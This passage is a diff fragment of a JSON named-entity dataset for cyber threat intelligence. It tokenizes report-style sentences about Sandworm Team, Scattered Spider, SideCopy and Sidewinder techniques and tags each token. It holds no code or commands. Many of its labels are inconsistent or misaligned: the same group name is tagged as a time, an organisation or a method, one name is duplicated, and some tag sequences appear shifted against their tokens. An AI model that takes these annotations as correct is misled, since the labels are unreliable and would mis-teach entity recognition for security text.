"computers", + "using", + "specific", + "software", + "as", + "part", + "of", + "its", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-Org", + "B-OffAct", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "the", + "commercially", + "available", + "tool", + "RemoteExec", + "for", + "agentless", + "remote", + "code", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "delivered", + "malicious", + "Microsoft", + "Office", + "attachments", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "crafted", + "phishing", + "emails", + "containing", + "malicious", + "hyperlinks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "crafted", + "spearphishing", + "emails", + "with", + "hyperlinks", + "designed", + "to", + "trick", + "unwitting", + "recipients", + "into", + "revealing", + "their", + "account", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team's", + "BCS-server", + "tool", + "uses", + "base64", + "encoding", + "and", + "HTML", + "tags", + "for", + "the", + "communication", + "traffic", + "between", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "used", + "information", + "stealer", + "malware", + "to", + "collect", + "browser", + "session", + "cookies." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "used", + "a", + "backdoor", + "to", + "enumerate", + "information", + "about", + "the", + "infected", + "system's", + "operating", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "had", + "gathered", + "user,", + "IP", + "address,", + "and", + "server", + "data", + "related", + "to", + "RDP", + "sessions", + "on", + "a", + "compromised", + "host.", + "It", + "has", + "also", + "accessed", + "network", + "diagram", + "files", + "useful", + "for", + "understanding", + "how", + "a", + "host's", + "network", + "was", + "configured." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "collected", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "acquired", + "open-source", + "tools", + "for", + "their", + "operations,", + "including", + "Invoke-PSImage,", + "which", + "was", + "used", + "to", + "establish", + "an", + "encrypted", + "channel", + "from", + "a", + "compromised", + "host", + "to", + "Sandworm", + "Team's", + "C2", + "server", + "in", + "preparation", + "for", + "the", + "2018", + "Winter", + "Olympics", + "attack,", + "as", + "well", + "as", + "Impacket", + "and", + "RemoteExec,", + "which", + "were", + "used", + "in", + "their", + "2022", + "Prestige", + "operations." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-OffAct", + "B-Area", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "dedicated", + "network", + "connections", + "from", + "one", + "victim", + "organization", + "to", + "gain", + "unauthorized", + "access", + "to", + "a", + "separate", + "organization." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "have", + "used", + "previously", + "acquired", + "legitimate", + "credentials", + "prior", + "to", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "created", + "VBScripts", + "to", + "run", + "an", + "SSH", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Tool" + ] + }, + { + "tokens": [ + "In", + "2017,", + "Sandworm", + "Team", + "conducted", + "technical", + "research", + "related", + "to", + "vulnerabilities", + "associated", + "with", + "websites", + "used", + "by", + "the", + "Korean", + "Sport", + "and", + "Olympic", + "Committee,", + "a", + "Korean", + "power", + "company,", + "and", + "a", + "Korean", + "airport." + ], + "ner_tags": [ + "O", + "B-Time", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "B-Org", + "O", + "I-Org", + "O", + "O", + "B-Area", + "I-Org", + "O", + "O", + "O", + "B-Area", + "B-Org" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "scanned", + "network", + "infrastructure", + "for", + "vulnerabilities", + "as", + "part", + "of", + "its", + "operational", + "planning." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team's", + "BCS-server", + "tool", + "connects", + "to", + "the", + "designated", + "C2", + "server", + "via", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "webshells", + "including", + "P.A.S.", + "Webshell", + "to", + "maintain", + "access", + "to", + "victim", + "networks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "Impacket’s", + "WMIexec", + "module", + "for", + "remote", + "code", + "execution", + "and", + "VBScript", + "to", + "run", + "WMI", + "queries." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Scarlet", + "Mimic", + "has", + "used", + "the", + "left-to-right", + "override", + "character", + "in", + "self-extracting", + "RAR", + "archive", + "spearphishing", + "attachment", + "file", + "names." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "IAM", + "manipulation", + "to", + "gain", + "persistence", + "and", + "to", + "assume", + "or", + "elevate", + "privileges.", + "Scattered", + "Spider", + "has", + "also", + "assigned", + "user", + "access", + "admin", + "roles", + "in", + "order", + "to", + "gain", + "Tenant", + "Root", + "Group", + "management", + "permissions", + "in", + "Azure." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "retrieves", + "browser", + "histories", + "via", + "infostealer", + "malware", + "such", + "as", + "Raccoon", + "Stealer." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "enumerates", + "cloud", + "environments", + "to", + "identify", + "server", + "and", + "backup", + "management", + "infrastructure,", + "resource", + "access,", + "databases", + "and", + "storage", + "containers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "abused", + "AWS", + "Systems", + "Manager", + "Inventory", + "to", + "identify", + "targets", + "on", + "the", + "compromised", + "network", + "prior", + "to", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "compromised", + "Azure", + "credentials", + "for", + "credential", + "theft", + "activity", + "and", + "lateral", + "movement", + "to", + "on-premises", + "systems.", + "Scattered", + "Spider", + "has", + "also", + "leveraged", + "pre-existing", + "AWS", + "EC2", + "instances", + "for", + "lateral", + "movement", + "and", + "data", + "collection", + "purposes." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "O", + "B-Way", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "enumerates", + "data", + "stored", + "within", + "victim", + "code", + "repositories,", + "such", + "as", + "internal", + "GitHub", + "repositories." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "used", + "self-signed", + "and", + "stolen", + "certificates", + "originally", + "issued", + "to", + "NVIDIA", + "and", + "Global", + "Software", + "LLC." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "added", + "additional", + "trusted", + "locations", + "to", + "Azure", + "AD", + "conditional", + "access", + "policies." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "creates", + "new", + "user", + "identities", + "within", + "the", + "compromised", + "organization." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "access", + "to", + "the", + "victim's", + "Azure", + "tenant", + "to", + "create", + "Azure", + "VMs.", + "Scattered", + "Spider", + "has", + "also", + "created", + "Amazon", + "EC2", + "instances", + "within", + "the", + "victim's", + "environment." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "Spider", + "searches", + "for", + "credential", + "storage", + "documentation", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "used", + "BlackCat", + "ransomware", + "to", + "encrypt", + "files", + "on", + "VMWare", + "ESXi", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Tool" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "stages", + "data", + "in", + "a", + "centralized", + "database", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "enumerates", + "data", + "stored", + "in", + "cloud", + "resources", + "for", + "collection", + "and", + "exfiltration", + "purposes." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "created", + "volume", + "shadow", + "copies", + "of", + "virtual", + "domain", + "controller", + "disks", + "to", + "extract", + "the", + "`NTDS.dit`", + "file." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "leverages", + "legitimate", + "domain", + "accounts", + "to", + "gain", + "access", + "to", + "the", + "target", + "environment." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "creates", + "inbound", + "rules", + "on", + "the", + "compromised", + "email", + "accounts", + "of", + "security", + "personnel", + "to", + "automatically", + "delete", + "emails", + "from", + "vendor", + "security", + "products." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "exfiltrated", + "victim", + "data", + "to", + "the", + "MEGA", + "file", + "sharing", + "site." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "deployed", + "a", + "malicious", + "kernel", + "driver", + "through", + "exploitation", + "of", + "CVE-2015-2291", + "in", + "the", + "Intel", + "Ethernet", + "diagnostics", + "driver", + "for", + "Windows", + "(iqvw64.sys)." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "leveraged", + "legitimate", + "remote", + "management", + "tools", + "to", + "maintain", + "persistent", + "access." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "Spider", + "enumerates", + "a", + "target", + "organization", + "for", + "files", + "and", + "directories", + "of", + "interest,", + "including", + "source", + "code." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "deployed", + "ransomware", + "on", + "compromised", + "hosts", + "for", + "financial", + "gain." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "impersonated", + "legitimate", + "IT", + "personnel", + "in", + "phone", + "calls", + "and", + "text", + "messages", + "either", + "to", + "direct", + "victims", + "to", + "a", + "credential", + "harvesting", + "site", + "or", + "getting", + "victims", + "to", + "run", + "commercial", + "remote", + "monitoring", + "and", + "management", + "(RMM)", + "tools.", + "Scattered", + "Spider", + "utilized", + "social", + "engineering", + "to", + "compel", + "IT", + "help", + "desk", + "personnel", + "to", + "reset", + "passwords", + "and", + "MFA", + "tokens." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Idus", + "B-HackOrg", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "compromising", + "user", + "accounts,", + "Scattered", + "Spider", + "registers", + "their", + "own", + "MFA", + "tokens." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "used", + "multifactor", + "authentication", + "(MFA)", + "fatigue", + "by", + "sending", + "repeated", + "MFA", + "authentication", + "requests", + "to", + "targets." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "extracted", + "the", + "`NTDS.dit`", + "file", + "by", + "creating", + "volume", + "shadow", + "copies", + "of", + "virtual", + "domain", + "controller", + "disks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "used", + "a", + "combination", + "of", + "credential", + "phishing", + "and", + "social", + "engineering", + "to", + "capture", + "one-time-password", + "(OTP)", + "codes." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "enumerate", + "and", + "exfiltrate", + "code-signing", + "certificates", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "directed", + "victims", + "to", + "run", + "remote", + "monitoring", + "and", + "management", + "(RMM)", + "tools.", + "In", + "addition", + "to", + "directing", + "victims", + "to", + "run", + "remote", + "software,", + "Scattered", + "Spider", + "members", + "themselves", + "also", + "deploy", + "RMM", + "software", + "including", + "AnyDesk,", + "LogMeIn,", + "and", + "ConnectWise", + "Control", + "to", + "establish", + "persistence", + "on", + "the", + "compromised", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "can", + "enumerate", + "remote", + "systems,", + "such", + "as", + "VMware", + "vCenter", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "C0027,", + "Scattered", + "Spider", + "used", + "phone", + "calls", + "to", + "instruct", + "victims", + "to", + "navigate", + "to", + "credential-harvesting", + "websites.", + "Scattered", + "Spider", + "has", + "also", + "called", + "employees", + "at", + "target", + "organizations", + "and", + "compelled", + "them", + "to", + "navigate", + "to", + "fake", + "login", + "portals", + "using", + "adversary-in-the-middle", + "toolkits." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "retrieves", + "browser", + "cookies", + "via", + "Raccoon", + "Stealer." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "adds", + "a", + "federated", + "identity", + "provider", + "to", + "the", + "victim’s", + "SSO", + "tenant", + "and", + "activates", + "automatic", + "account", + "linking." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scattered", + "Spider", + "has", + "impersonated", + "organization", + "IT", + "and", + "helpdesk", + "staff", + "to", + "instruct", + "victims", + "to", + "execute", + "commercial", + "remote", + "access", + "tools", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "used", + "a", + "malicious", + "loader", + "DLL", + "file", + "to", + "execute", + "the", + "`credwiz.exe`", + "process", + "and", + "side-load", + "the", + "malicious", + "payload", + "`Duser.dll`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "compromised", + "domains", + "for", + "some", + "of", + "their", + "infrastructure,", + "including", + "for", + "C2", + "and", + "staging", + "malware." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "delivered", + "trojanized", + "executables", + "via", + "spearphishing", + "emails", + "that", + "contacts", + "actor-controlled", + "servers", + "to", + "download", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Purp" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "attempted", + "to", + "lure", + "victims", + "into", + "clicking", + "on", + "malicious", + "embedded", + "archive", + "files", + "sent", + "via", + "spearphishing", + "campaigns." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "used", + "a", + "legitimate", + "DLL", + "file", + "name,", + "`Duser.dll`", + "to", + "disguise", + "a", + "malicious", + "remote", + "access", + "tool." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "utilized", + "`mshta.exe`", + "to", + "execute", + "a", + "malicious", + "hta", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "executed", + "malware", + "by", + "calling", + "the", + "API", + "function", + "`CreateProcessW`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "uses", + "a", + "loader", + "DLL", + "file", + "to", + "collect", + "AV", + "product", + "names", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "collected", + "browser", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "sent", + "spearphishing", + "emails", + "with", + "malicious", + "hta", + "file", + "attachments." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "crafted", + "generic", + "lures", + "for", + "spam", + "campaigns", + "to", + "collect", + "emails", + "and", + "credentials", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "identified", + "the", + "OS", + "version", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "identified", + "the", + "country", + "location", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "identified", + "the", + "IP", + "address", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "used", + "compromised", + "domains", + "to", + "host", + "its", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideCopy", + "has", + "sent", + "Microsoft", + "Office", + "Publisher", + "documents", + "to", + "victims", + "that", + "have", + "embedded", + "malicious", + "macros", + "that", + "execute", + "an", + "hta", + "file", + "via", + "calling", + "`mshta.exe`." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "tools", + "to", + "automatically", + "collect", + "system", + "and", + "network", + "configuration", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "configured", + "tools", + "to", + "automatically", + "send", + "collected", + "files", + "to", + "attacker", + "controlled", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "base64", + "encoding", + "for", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "DLL", + "side-loading", + "to", + "drop", + "and", + "execute", + "malicious", + "payloads", + "including", + "the", + "hijacking", + "of", + "the", + "legitimate", + "Windows", + "application", + "file", + "rekeywiz.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 